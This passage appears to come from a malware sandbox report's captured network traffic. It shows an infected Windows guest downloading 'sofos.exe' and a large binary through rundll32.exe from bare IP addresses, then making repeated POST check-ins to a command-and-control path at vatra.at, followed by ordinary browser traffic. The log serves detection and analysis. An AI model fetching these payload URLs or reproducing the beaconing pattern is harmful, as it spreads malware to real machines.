                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 43
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://146.19.173.115/sofos.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      146.19.173.115:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /sofos.exe HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Host: 146.19.173.115
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:10 GMT
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Length: 1118208
                                                                                                                                                                      Last-Modified: Mon, 09 Jan 2023 12:40:01 GMT
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      ETag: "63bc0b21-111000"
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://uufmj.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 183
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:11 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://dtqksouqyq.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 286
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:12 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://gjpxk.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 181
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:13 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://fyrmc.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 328
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:14 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://bybohq.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 173
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:15 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://23.236.181.126/15xiW+BIFu4CehxXIK6zP9cptAUCnbfRJqwglaWndmvySgK+EsfJbDWQYoDabXLiA0AA7673OwpyOYw+FQqeHbMLrJdzu86qS79QKnsjLIn3L4o0tsF3JdWKzZ7/amDwXqbhezN2lNLEZHxs9BosLFKgb7F6vbEU10hcUTSZag06sZdlLBLPjkwSyA==
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      23.236.181.126:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /15xiW+BIFu4CehxXIK6zP9cptAUCnbfRJqwglaWndmvySgK+EsfJbDWQYoDabXLiA0AA7673OwpyOYw+FQqeHbMLrJdzu86qS79QKnsjLIn3L4o0tsF3JdWKzZ7/amDwXqbhezN2lNLEZHxs9BosLFKgb7F6vbEU10hcUTSZag06sZdlLBLPjkwSyA== HTTP/1.1
                                                                                                                                                                      Host: 23.236.181.126
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 200 OK
                                                                                                                                                                      Server: Apache/2.4.7 (Ubuntu)
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      Content-Disposition: attachment; filename=7FA833348663535EA47A3807B2D8276F
                                                                                                                                                                      Connection: Close
                                                                                                                                                                      Content-Length: 3654016
                                                                                                                                                                      Connection: close
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://itycxb.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 314
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:16 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://ckpgq.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 150
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:17 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://boebdia.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 234
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:18 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://hnyuul.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 158
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:19 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://noiqqfyy.org/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 252
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:20 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://nokye.com/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 344
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:21 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://uspgdp.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 226
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:22 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      http://vatra.at/tmp/
                                                                                                                                                                      Remote address:
                                                                                                                                                                      190.147.188.50:80
                                                                                                                                                                      Request
                                                                                                                                                                      POST /tmp/ HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Referer: http://asvappce.net/
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Length: 237
                                                                                                                                                                      Host: vatra.at
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.0 404 Not Found
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:48:23 GMT
                                                                                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      clients2.google.com
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      clients2.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      clients2.google.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      clients.l.google.com
                                                                                                                                                                      clients.l.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      172.217.168.238
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      accounts.google.com
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      accounts.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      accounts.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      142.251.36.45
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.45:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/2.0
                                                                                                                                                                      host: accounts.google.com
                                                                                                                                                                      content-length: 1
                                                                                                                                                                      origin: https://www.google.com
                                                                                                                                                                      content-type: application/x-www-form-urlencoded
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=89.0.4389.114&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D150%2526e%253D1
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      172.217.168.238:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=89.0.4389.114&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D150%2526e%253D1 HTTP/2.0
                                                                                                                                                                      host: clients2.google.com
                                                                                                                                                                      x-goog-update-interactivity: fg
                                                                                                                                                                      x-goog-update-appid: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
                                                                                                                                                                      x-goog-update-updater: chromecrx-89.0.4389.114
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: empty
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      edgedl.me.gvt1.com
                                                                                                                                                                      IN A
                                                                                                                                                                      34.104.35.123
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx HTTP/1.1
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-length: 248531
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      x-request-id: edd79e58-4ede-489a-b3fd-bf299e4d5ec6
                                                                                                                                                                      date: Sun, 08 Jan 2023 18:08:41 GMT
                                                                                                                                                                      age: 67208
                                                                                                                                                                      last-modified: Fri, 25 Feb 2022 22:08:36 GMT
                                                                                                                                                                      etag: "c994e6"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      apis.google.com
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      apis.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      apis.google.com
                                                                                                                                                                      IN CNAME
                                                                                                                                                                      plus.l.google.com
                                                                                                                                                                      plus.l.google.com
                                                                                                                                                                      IN A
                                                                                                                                                                      216.58.208.110
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.WEPncdil2Uw.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-eOecLLtOXEl3I3kIuMsKXRkDMmA/cb=gapi.loaded_0
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.58.208.110:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /_/scs/abc-static/_/js/k=gapi.gapi.en.WEPncdil2Uw.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-eOecLLtOXEl3I3kIuMsKXRkDMmA/cb=gapi.loaded_0 HTTP/2.0
                                                                                                                                                                      host: apis.google.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: cross-site
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      DNS
                                                                                                                                                                      dns.google
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                      Request
                                                                                                                                                                      dns.google
                                                                                                                                                                      IN A
                                                                                                                                                                      Response
                                                                                                                                                                      dns.google
                                                                                                                                                                      IN A
                                                                                                                                                                      8.8.4.4
                                                                                                                                                                      dns.google
                                                                                                                                                                      IN A
                                                                                                                                                                      8.8.8.8
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      8.8.4.4:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/2.0
                                                                                                                                                                      host: dns.google
                                                                                                                                                                      accept: application/dns-message
                                                                                                                                                                      accept-language: *
                                                                                                                                                                      user-agent: Chrome
                                                                                                                                                                      accept-encoding: identity
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
